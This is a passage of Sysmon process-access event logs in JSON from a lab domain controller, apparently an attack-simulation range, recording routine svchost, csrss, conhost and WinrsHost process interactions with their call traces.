C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.740","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8464,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.740\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.740","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8465,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.740\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.740","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8466,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.740\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.740","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8467,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.740\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.740","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8468,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.740\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.740","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8469,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.756\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22D1-5F25-0000-00107FAD1100}\r\nTargetProcessId: 3592\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.756","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22D1-5F25-0000-00107FAD1100}","TargetProcessId":"3592","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8470,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.756\r\nSourceProcessGUID: {41C8662E-22D1-5F25-0000-00107FAD1100}\r\nSourceProcessId: 3592\r\nSourceThreadId: 4220\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-22D1-5F25-0000-00100BAD1100}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.756","SourceProcessGUID":"{41C8662E-22D1-5F25-0000-00107FAD1100}","SourceProcessId":"3592","SourceThreadId":"4220","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-22D1-5F25-0000-00100BAD1100}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8471,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.771\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22D1-5F25-0000-00100BAD1100}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.771","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22D1-5F25-0000-00100BAD1100}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
